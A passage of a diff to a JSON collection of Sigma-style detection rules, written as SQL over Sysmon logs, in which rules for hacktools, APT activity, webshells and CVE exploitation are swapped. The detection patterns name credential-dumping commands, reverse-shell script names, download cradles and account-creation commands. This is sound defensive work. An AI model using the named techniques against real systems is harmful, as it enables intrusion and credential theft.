/i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "cve.2022.29072" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", - "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "status": "test", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "attack.t1562.001" ], - "filename": "proc_creation_win_malware_dridex.yml" - }, - { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' 